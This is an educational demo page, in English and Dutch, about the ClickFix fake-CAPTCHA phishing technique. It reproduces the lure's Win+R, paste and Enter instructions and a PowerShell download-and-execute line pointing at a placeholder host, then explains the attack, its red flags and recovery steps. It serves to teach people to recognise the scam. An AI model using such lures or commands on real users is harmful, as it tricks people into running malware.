Verify you are human
Please complete the verification below to continue.
Additional verification required
To prove you are human, please complete the following steps:
-
1
Press Windows + R on your keyboard
-
2
Press Ctrl + V to paste the verification code
-
3
Press Enter to verify
powershell -c "iwr https://not-a-real-url.example/verify | iex"
Gotcha! This is the ClickFix phishing technique.
Don’t worry — nothing was copied to your clipboard and no command was executed. This demo is purely educational.
What just happened?
This is a real and growing attack called ClickFix (also known as “fake CAPTCHA”).
Attackers clone a CAPTCHA or “verify you’re human” page. When you click it, the page silently
copies a malicious command to your clipboard, then instructs you to open Run (Win+R),
paste it (Ctrl+V), and press Enter — effectively executing malware with your own hands.
Red flags you could have spotted:
- No legitimate CAPTCHA ever asks you to open Run, Terminal, or PowerShell. Ever. Full stop.
- No legitimate site asks you to paste anything into a system dialog.
- Instructions involving Win+R, Ctrl+V, Enter are a huge warning. That keystroke sequence only exists in attack tutorials.
- Unfamiliar domain. Real Google reCAPTCHA loads from
google.com, hCaptcha fromhcaptcha.com. - Strange context. Why does this random site need you to verify? What were you doing before you landed here?
What to do if this happens for real:
- Close the tab immediately. Do not follow the instructions.
- If you already pasted into Run but haven’t pressed Enter — clear the field and close it. You’re fine.
- If you already executed the command, disconnect from the network, run a full antivirus scan, and change your important passwords from a different device. Report it to your IT/security team.
- Clear your clipboard by copying something harmless after you realize what happened.
Hebbes! Dit is de ClickFix-phishingtruc.
Geen zorgen — er is niets naar je klembord gekopieerd en geen commando uitgevoerd. Deze demo is puur educatief.
Wat is er net gebeurd?
Dit is een echte en snel groeiende aanval die ClickFix heet (ook bekend als “nep-CAPTCHA”).
Aanvallers maken een kopie van een CAPTCHA of “ik ben geen robot”-pagina. Bij klikken zet de pagina stiekem een
kwaadaardig commando op je klembord, en instrueert je vervolgens om Uitvoeren te openen (Win+R),
het te plakken (Ctrl+V) en op Enter te drukken — waardoor je met je eigen handen malware uitvoert.
Rode vlaggen die je had kunnen opmerken:
- Geen enkele echte CAPTCHA vraagt je ooit om Uitvoeren, Terminal of PowerShell te openen. Nooit. Punt.
- Geen enkele legitieme site vraagt je om iets in een systeemdialoog te plakken.
- Instructies met Win+R, Ctrl+V, Enter zijn een enorme waarschuwing. Die toetsencombinatie bestaat alleen in aanvalsrecepten.
- Onbekend domein. Echte Google reCAPTCHA laadt van
google.com, hCaptcha vanhcaptcha.com. - Rare context. Waarom moet je op deze willekeurige site verifiëren? Wat deed je voordat je hier belandde?
Wat te doen als dit echt gebeurt:
- Sluit het tabblad direct. Volg de instructies niet op.
- Al geplakt in Uitvoeren maar nog geen Enter ingedrukt? Wis het veld en sluit het. Je bent veilig.
- Heb je het commando al uitgevoerd? Verbreek je netwerk, draai een volledige virusscan en wijzig belangrijke wachtwoorden vanaf een ander apparaat. Meld het aan je IT-/securityteam.
- Wis je klembord door iets onschuldigs te kopiëren zodra je doorhebt wat er gebeurd is.